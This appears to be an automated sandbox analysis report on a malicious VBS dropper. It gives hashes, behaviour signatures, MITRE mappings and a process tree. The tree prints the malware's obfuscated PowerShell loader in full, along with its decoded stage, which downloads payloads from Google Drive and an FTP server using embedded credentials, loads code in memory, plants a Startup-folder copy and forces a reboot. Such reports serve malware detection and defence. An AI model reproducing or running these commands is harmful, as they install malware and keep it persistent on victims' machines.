4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b

General

Target

4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs
Size

561KB
MD5

e5d5bfe30179b640a80ae3cc1640e486
SHA1

5c5a868d8b688884b8a47deb61a3ee9ca08fbdd4
SHA256

4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b
SHA512

cae7eac6bf7106bb663c042f1ea77393a62b6ec9555667e07736997fc69f219fa83b30fcaf1c93a4a1a300879ec0fe33aa8cdc22d303f795f36dc285639f488b
SSDEEP

1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFp:vSe

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3056	powershell.exe
2780	powershell.exe
2628	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3056	powershell.exe
2780	powershell.exe
2912	powershell.exe
2628	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1120 wrote to memory of 3056	1120	WScript.exe	28
PID 1120 wrote to memory of 3056	1120	WScript.exe	28
PID 1120 wrote to memory of 3056	1120	WScript.exe	28
PID 3056 wrote to memory of 2780	3056	powershell.exe	30
PID 3056 wrote to memory of 2780	3056	powershell.exe	30
PID 3056 wrote to memory of 2780	3056	powershell.exe	30
PID 2780 wrote to memory of 2912	2780	powershell.exe	31
PID 2780 wrote to memory of 2912	2780	powershell.exe	31
PID 2780 wrote to memory of 2912	2780	powershell.exe	31
PID 2912 wrote to memory of 2820	2912	powershell.exe	32
PID 2912 wrote to memory of 2820	2912	powershell.exe	32
PID 2912 wrote to memory of 2820	2912	powershell.exe	32
PID 2780 wrote to memory of 2628	2780	powershell.exe	33
PID 2780 wrote to memory of 2628	2780	powershell.exe	33
PID 2780 wrote to memory of 2628	2780	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9ҼмẦDsҼмẦKQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦGUҼмẦdQByҼмẦHQҼмẦJwҼмẦgҼмẦCwҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦgҼмẦCwҼмẦIҼмẦҼмẦnҼмẦGgҼмẦdҼмẦB0ҼмẦHҼмẦҼмẦcwҼмẦ6ҼмẦC8ҼмẦLwBlҼмẦHYҼмẦaQByҼмẦHQҼмẦdQBhҼмẦGwҼмẦcwBlҼмẦHIҼмẦdgBpҼмẦGMҼмẦZQBzҼмẦHIҼмẦZQB2ҼмẦGkҼмẦZQB3ҼмẦHMҼмẦLgBjҼмẦG8ҼмẦbQҼмẦvҼмẦGMҼмẦZҼмẦҼмẦuҼмẦHQҼмẦeҼмẦB0ҼмẦCcҼмẦIҼмẦҼмẦoҼмẦCҼмẦҼмẦXQBdҼмẦFsҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦG8ҼмẦWwҼмẦgҼмẦCwҼмẦIҼмẦBsҼмẦGwҼмẦdQBuҼмẦCQҼмẦIҼмẦҼмẦoҼмẦGUҼмẦawBvҼмẦHYҼмẦbgBJҼмẦC4ҼмẦKQҼмẦgҼмẦCcҼмẦSQBWҼмẦEYҼмẦcgBwҼмẦCcҼмẦIҼмẦҼмẦoҼмẦGQҼмẦbwBoҼмẦHQҼмẦZQBNҼмẦHQҼмẦZQBHҼмẦC4ҼмẦKQҼмẦnҼмẦDEҼмẦcwBzҼмẦGEҼмẦbҼмẦBDҼмẦC4ҼмẦMwB5ҼмẦHIҼмẦYQByҼмẦGIҼмẦaQBMҼмẦHMҼмẦcwBhҼмẦGwҼмẦQwҼмẦnҼмẦCgҼмẦZQBwҼмẦHkҼмẦVҼмẦB0ҼмẦGUҼмẦRwҼмẦuҼмẦCkҼмẦIҼмẦBaҼмẦGMҼмẦQgBjҼмẦGEҼмẦJҼмẦҼмẦgҼмẦCgҼмẦZҼмẦBhҼмẦG8ҼмẦTҼмẦҼмẦuҼмẦG4ҼмẦaQBhҼмẦG0ҼмẦbwBEҼмẦHQҼмẦbgBlҼмẦHIҼмẦcgB1ҼмẦEMҼмẦOgҼмẦ6ҼмẦF0ҼмẦbgBpҼмẦGEҼмẦbQBvҼмẦEQҼмẦcҼмẦBwҼмẦEEҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦDsҼмẦKQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦEEҼмẦJwҼмẦgҼмẦCwҼмẦIҼмẦҼмẦnҼмẦJMhOgCTIScҼмẦIҼмẦҼмẦoҼмẦGUҼмẦYwBhҼмẦGwҼмẦcҼмẦBlҼмẦFIҼмẦLgBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦCҼмẦҼмẦKҼмẦBnҼмẦG4ҼмẦaQByҼмẦHQҼмẦUwҼмẦ0ҼмẦDYҼмẦZQBzҼмẦGEҼмẦQgBtҼмẦG8ҼмẦcgBGҼмẦDoҼмẦOgBdҼмẦHQҼмẦcgBlҼмẦHYҼмẦbgBvҼмẦEMҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦCҼмẦҼмẦPQҼмẦgҼмẦFoҼмẦYwBCҼмẦGMҼмẦYQҼмẦkҼмẦCҼмẦҼмẦXQBdҼмẦFsҼмẦZQB0ҼмẦHkҼмẦQgBbҼмẦDsҼмẦJwҼмẦlҼмẦEkҼмẦaҼмẦBxҼмẦFIҼмẦWҼмẦҼмẦlҼмẦCcҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦWҼмẦBQҼмẦFUҼмẦdQBoҼмẦCQҼмẦOwҼмẦpҼмẦCҼмẦҼмẦZwBTҼмẦHoҼмẦQwBCҼмẦGwҼмẦJҼмẦҼмẦgҼмẦCgҼмẦZwBuҼмẦGkҼмẦcgB0ҼмẦFMҼмẦZҼмẦBhҼмẦG8ҼмẦbҼмẦBuҼмẦHcҼмẦbwBEҼмẦC4ҼмẦcgB5ҼмẦGsҼмẦdҼмẦҼмẦkҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦOwҼмẦ4ҼмẦEYҼмẦVҼмẦBVҼмẦDoҼмẦOgBdҼмẦGcҼмẦbgBpҼмẦGQҼмẦbwBjҼмẦG4ҼмẦRQҼмẦuҼмẦHQҼмẦeҼмẦBlҼмẦFQҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGcҼмẦbgBpҼмẦGQҼмẦbwBjҼмẦG4ҼмẦRQҼмẦuҼмẦHIҼмẦeQBrҼмẦHQҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦdҼмẦBuҼмẦGUҼмẦaQBsҼмẦEMҼмẦYgBlҼмẦFcҼмẦLgB0ҼмẦGUҼмẦTgҼмẦgҼмẦHQҼмẦYwBlҼмẦGoҼмẦYgBPҼмẦC0ҼмẦdwBlҼмẦE4ҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦByҼмẦHkҼмẦawB0ҼмẦCQҼмẦOwҼмẦpҼмẦCgҼмẦZQBzҼмẦG8ҼмẦcҼмẦBzҼмẦGkҼмẦZҼмẦҼмẦuҼмẦHIҼмẦeQBrҼмẦHQҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦIҼмẦҼмẦnҼмẦHQҼмẦeҼмẦB0ҼмẦC4ҼмẦMQҼмẦwҼмẦEwҼмẦTҼмẦBEҼмẦC8ҼмẦMQҼмẦwҼмẦC8ҼмẦcgBlҼмẦHQҼмẦcҼмẦB5ҼмẦHIҼмẦYwBwҼмẦFUҼмẦLwByҼмẦGIҼмẦLgBtҼмẦG8ҼмẦYwҼмẦuҼмẦHQҼмẦYQByҼмẦGIҼмẦdgBrҼмẦGMҼмẦcwBlҼмẦGQҼмẦLgBwҼмẦHQҼмẦZgBҼмẦҼмẦDEҼмẦdҼмẦBhҼмẦHIҼмẦYgB2ҼмẦGsҼмẦYwBzҼмẦGUҼмẦZҼмẦҼмẦvҼмẦC8ҼмẦOgBwҼмẦHQҼмẦZgҼмẦnҼмẦCҼмẦҼмẦKҼмẦBnҼмẦG4ҼмẦaQByҼмẦHQҼмẦUwBkҼмẦGEҼмẦbwBsҼмẦG4ҼмẦdwBvҼмẦEQҼмẦLgByҼмẦHkҼмẦawB0ҼмẦCQҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBTҼмẦHoҼмẦQwBCҼмẦGwҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦJwBҼмẦҼмẦEҼмẦҼмẦcҼмẦBKҼмẦDgҼмẦNwҼмẦ1ҼмẦDEҼмẦMgBvҼмẦHIҼмẦcҼмẦByҼмẦGUҼмẦcҼмẦBvҼмẦGwҼмẦZQB2ҼмẦGUҼмẦZҼмẦҼмẦnҼмẦCwҼмẦKQҼмẦpҼмẦDkҼмẦNҼмẦҼмẦsҼмẦDYҼмẦMQҼмẦxҼмẦCwҼмẦNwҼмẦ5ҼмẦCwҼмẦNҼмẦҼмẦxҼмẦDEҼмẦLҼмẦҼмẦ4ҼмẦDkҼмẦLҼмẦҼмẦ4ҼмẦDEҼмẦMQҼмẦsҼмẦDcҼмẦMҼмẦҼмẦxҼмẦCwҼмẦOQҼмẦ5ҼмẦCwҼмẦNQҼмẦxҼмẦDEҼмẦLҼмẦҼмẦxҼмẦDҼмẦҼмẦMQҼмẦsҼмẦDҼмẦҼмẦMҼмẦҼмẦxҼмẦCgҼмẦXQBdҼмẦFsҼмẦcgBhҼмẦGgҼмẦYwBbҼмẦCҼмẦҼмẦbgBpҼмẦG8ҼмẦagҼмẦtҼмẦCgҼмẦKҼмẦBsҼмẦGEҼмẦaQB0ҼмẦG4ҼмẦZQBkҼмẦGUҼмẦcgBDҼмẦGsҼмẦcgBvҼмẦHcҼмẦdҼмẦBlҼмẦE4ҼмẦLgB0ҼмẦGUҼмẦTgҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦG8ҼмẦLQB3ҼмẦGUҼмẦbgҼмẦgҼмẦD0ҼмẦIҼмẦBzҼмẦGwҼмẦYQBpҼмẦHQҼмẦbgBlҼмẦGQҼмẦZQByҼмẦEMҼмẦLgByҼмẦHkҼмẦawB0ҼмẦCQҼмẦOwҼмẦ4ҼмẦEYҼмẦVҼмẦBVҼмẦDoҼмẦOgBdҼмẦGcҼмẦbgBpҼмẦGQҼмẦbwBjҼмẦG4ҼмẦRQҼмẦuҼмẦHQҼмẦeҼмẦBlҼмẦFQҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGcҼмẦbgBpҼмẦGQҼмẦbwBjҼмẦG4ҼмẦRQҼмẦuҼмẦHIҼмẦeQBrҼмẦHQҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦdҼмẦBuҼмẦGUҼмẦaQBsҼмẦEMҼмẦYgBlҼмẦFcҼмẦLgB0ҼмẦGUҼмẦTgҼмẦgҼмẦHQҼмẦYwBlҼмẦGoҼмẦYgBPҼмẦC0ҼмẦdwBlҼмẦE4ҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦByҼмẦHkҼмẦawB0ҼмẦCQҼмẦOwBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦDsҼмẦMgҼмẦxҼмẦHMҼмẦbҼмẦBUҼмẦDoҼмẦOgBdҼмẦGUҼмẦcҼмẦB5ҼмẦFQҼмẦbҼмẦBvҼмẦGMҼмẦbwB0ҼмẦG8ҼмẦcgBQҼмẦHkҼмẦdҼмẦBpҼмẦHIҼмẦdQBjҼмẦGUҼмẦUwҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦgҼмẦD0ҼмẦIҼмẦBsҼмẦG8ҼмẦYwBvҼмẦHQҼмẦbwByҼмẦFҼмẦҼмẦeQB0ҼмẦGkҼмẦcgB1ҼмẦGMҼмẦZQBTҼмẦDoҼмẦOgBdҼмẦHIҼмẦZQBnҼмẦGEҼмẦbgBhҼмẦE0ҼмẦdҼмẦBuҼмẦGkҼмẦbwBQҼмẦGUҼмẦYwBpҼмẦHYҼмẦcgBlҼмẦFMҼмẦLgB0ҼмẦGUҼмẦTgҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦOwB9ҼмẦGUҼмẦdQByҼмẦHQҼмẦJҼмẦB7ҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGsҼмẦYwBhҼмẦGIҼмẦbҼмẦBsҼмẦGEҼмẦQwBuҼмẦG8ҼмẦaQB0ҼмẦGEҼмẦZҼмẦBpҼмẦGwҼмẦYQBWҼмẦGUҼмẦdҼмẦBhҼмẦGMҼмẦaQBmҼмẦGkҼмẦdҼмẦByҼмẦGUҼмẦQwByҼмẦGUҼмẦdgByҼмẦGUҼмẦUwҼмẦ6ҼмẦDoҼмẦXQByҼмẦGUҼмẦZwBhҼмẦG4ҼмẦYQBNҼмẦHQҼмẦbgBpҼмẦG8ҼмẦUҼмẦBlҼмẦGMҼмẦaQB2ҼмẦHIҼмẦZQBTҼмẦC4ҼмẦdҼмẦBlҼмẦE4ҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦHsҼмẦIҼмẦBlҼмẦHMҼмẦbҼмẦBlҼмẦH0ҼмẦIҼмẦBmҼмẦC8ҼмẦIҼмẦҼмẦwҼмẦCҼмẦҼмẦdҼмẦҼмẦvҼмẦCҼмẦҼмẦcgҼмẦvҼмẦCҼмẦҼмẦZQB4ҼмẦGUҼмẦLgBuҼмẦHcҼмẦbwBkҼмẦHQҼмẦdQBoҼмẦHMҼмẦIҼмẦҼмẦ7ҼмẦCcҼмẦMҼмẦҼмẦ4ҼмẦDEҼмẦIҼмẦBwҼмẦGUҼмẦZQBsҼмẦHMҼмẦJwҼмẦgҼмẦGQҼмẦbgBhҼмẦG0ҼмẦbQBvҼмẦGMҼмẦLQҼмẦgҼмẦGUҼмẦeҼмẦBlҼмẦC4ҼмẦbҼмẦBsҼмẦGUҼмẦaҼмẦBzҼмẦHIҼмẦZQB3ҼмẦG8ҼмẦcҼмẦҼмẦ7ҼмẦCҼмẦҼмẦZQBjҼмẦHIҼмẦbwBmҼмẦC0ҼмẦIҼмẦҼмẦpҼмẦCҼмẦҼмẦJwBwҼмẦHUҼмẦdҼмẦByҼмẦGEҼмẦdҼмẦBTҼмẦFwҼмẦcwBtҼмẦGEҼмẦcgBnҼмẦG8ҼмẦcgBQҼмẦFwҼмẦdQBuҼмẦGUҼмẦTQҼмẦgҼмẦHQҼмẦcgBhҼмẦHQҼмẦUwBcҼмẦHMҼмẦdwBvҼмẦGQҼмẦbgBpҼмẦFcҼмẦXҼмẦB0ҼмẦGYҼмẦbwBzҼмẦG8ҼмẦcgBjҼмẦGkҼмẦTQBcҼмẦGcҼмẦbgBpҼмẦG0ҼмẦYQBvҼмẦFIҼмẦXҼмẦBhҼмẦHQҼмẦYQBEҼмẦHҼмẦҼмẦcҼмẦBBҼмẦFwҼмẦJwҼмẦgҼмẦCsҼмẦIҼмẦBaҼмẦEsҼмẦbgBZҼмẦE0ҼмẦJҼмẦҼмẦgҼмẦCgҼмẦIҼмẦBuҼмẦG8ҼмẦaQB0ҼмẦGEҼмẦbgBpҼмẦHQҼмẦcwBlҼмẦEQҼмẦLQҼмẦgҼмẦCcҼмẦJQBJҼмẦGgҼмẦcQBSҼмẦFgҼмẦJQҼмẦnҼмẦCҼмẦҼмẦbQBlҼмẦHQҼмẦSQҼмẦtҼмẦHkҼмẦcҼмẦBvҼмẦEMҼмẦIҼмẦҼмẦ7ҼмẦCҼмẦҼмẦdҼмẦByҼмẦGEҼмẦdҼмẦBzҼмẦGUҼмẦcgBvҼмẦG4ҼмẦLwҼмẦgҼмẦHQҼмẦZQBpҼмẦHUҼмẦcQҼмẦvҼмẦCҼмẦҼмẦRwBjҼмẦFcҼмẦaQBSҼмẦCҼмẦҼмẦZQB4ҼмẦGUҼмẦLgBhҼмẦHMҼмẦdQB3ҼмẦCҼмẦҼмẦZQB4ҼмẦGUҼмẦLgBsҼмẦGwҼмẦZQBoҼмẦHMҼмẦcgBlҼмẦHcҼмẦbwBwҼмẦCҼмẦҼмẦOwҼмẦpҼмẦCcҼмẦdQBzҼмẦG0ҼмẦLgBuҼмẦGkҼмẦdwBwҼмẦFUҼмẦXҼмẦҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦE4ҼмẦSgBUҼмẦHgҼмẦRҼмẦҼмẦkҼмẦCgҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦRwBjҼмẦFcҼмẦaQBSҼмẦDsҼмẦKQҼмẦgҼмẦGUҼмẦbQBhҼмẦE4ҼмẦcgBlҼмẦHMҼмẦVQҼмẦ6ҼмẦDoҼмẦXQB0ҼмẦG4ҼмẦZQBtҼмẦG4ҼмẦbwByҼмẦGkҼмẦdgBuҼмẦEUҼмẦWwҼмẦgҼмẦCsҼмẦIҼмẦҼмẦnҼмẦFwҼмẦcwByҼмẦGUҼмẦcwBVҼмẦFwҼмẦOgBDҼмẦCcҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBaҼмẦEsҼмẦbgBZҼмẦE0ҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦJwB1ҼмẦHMҼмẦbQҼмẦuҼмẦG4ҼмẦaQB3ҼмẦHҼмẦҼмẦVQBcҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦTgBKҼмẦFQҼмẦeҼмẦBEҼмẦCQҼмẦIҼмẦҼмẦsҼмẦEIҼмẦSwBMҼмẦFIҼмẦVQҼмẦkҼмẦCgҼмẦZQBsҼмẦGkҼмẦRgBkҼмẦGEҼмẦbwBsҼмẦG4ҼмẦdwBvҼмẦEQҼмẦLgBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦcwB0ҼмẦG0ҼмẦbwBvҼмẦCQҼмẦOwҼмẦpҼмẦHQҼмẦbgBlҼмẦGkҼмẦbҼмẦBDҼмẦGIҼмẦZQBXҼмẦC4ҼмẦdҼмẦBlҼмẦE4ҼмẦIҼмẦB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦTwҼмẦtҼмẦHcҼмẦZQBOҼмẦCgҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦcwB0ҼмẦG0ҼмẦbwBvҼмẦCQҼмẦOwB9ҼмẦDsҼмẦIҼмẦҼмẦpҼмẦCcҼмẦdҼмẦBPҼмẦEwҼмẦYwBfҼмẦEsҼмẦYQҼмẦzҼмẦFoҼмẦZgBvҼмẦFgҼмẦMgBKҼмẦEoҼмẦcgBWҼмẦGgҼмẦbQBWҼмẦDkҼмẦYwBtҼмẦDkҼмẦWҼмẦBzҼмẦHUҼмẦWҼмẦBtҼмẦGoҼмẦMQBnҼмẦDEҼмẦJwҼмẦgҼмẦCsҼмẦIҼмẦBvҼмẦHgҼмẦSwBVҼмẦGcҼмẦJҼмẦҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦG8ҼмẦeҼмẦBLҼмẦFUҼмẦZwҼмẦkҼмẦHsҼмẦIҼмẦBlҼмẦHMҼмẦbҼмẦBlҼмẦH0ҼмẦOwҼмẦgҼмẦCkҼмẦJwҼмẦyҼмẦDQҼмẦdQBYҼмẦEoҼмẦVҼмẦBxҼмẦGEҼмẦbQBnҼмẦHkҼмẦTQB0ҼмẦEYҼмẦegBhҼмẦGsҼмẦUҼмẦBSҼмẦDEҼмẦcQBfҼмẦEkҼмẦdgBHҼмẦGkҼмẦWҼмẦBOҼмẦGQҼмẦcQBhҼмẦE4ҼмẦMQҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦG8ҼмẦeҼмẦBLҼмẦFUҼмẦZwҼмẦkҼмẦCgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBVҼмẦGcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABkAHYAbwBmAFgAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABkAHYAbwBmAFgAJAAgADsA';$kahlN = $qKKzc.replace('ҼмẦ' , 'A') ;$DLOWx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $DLOWx = $DLOWx[-1..-$DLOWx.Length] -join '';$DLOWx = $DLOWx.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs');powershell $DLOWx
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Xfovd = $host.Version.Major.Equals(2) ;if ( $Xfovd ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$oomts = (New-Object Net.WebClient);$oomts.Encoding = [System.Text.Encoding]::UTF8;$oomts.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$tkyr = (New-Object Net.WebClient);$tkyr.Encoding = [System.Text.Encoding]::UTF8;$tkyr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $tkyr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$tkyr.dispose();$tkyr = (New-Object Net.WebClient);$tkyr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $tkyr.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\4252980510d6ea59efb52bb30a67f8173b7f905e1ea368113ab6e60f2a99105b.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.dc/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe RiWcG /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" RiWcG /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1f9dd34b7605768442d4a9adfd0afb77

SHA1
48f867aad43cd0d348935395db20d3eb1cd80d8a

SHA256
8d851033bf40dd86398b2b185be7e11ca7827d3b94ee81cfcc8e0c4863c2fbd3

SHA512
088ac6500586e2e604578041983ee02c502d28788aad7931349aa5666e454da2cea9106d0b9b9b1a40c4b37a618e02deb8991d46236123f5bdffe52b418309a8

Download Submit
memory/3056-4-0x000007FEF5BAE000-0x000007FEF5BAF000-memory.dmp

Filesize
4KB

Download
memory/3056-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/3056-6-0x0000000001D70000-0x0000000001D78000-memory.dmp

Filesize
32KB

Download
memory/3056-12-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/3056-25-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/3056-26-0x000007FEF5BAE000-0x000007FEF5BAF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing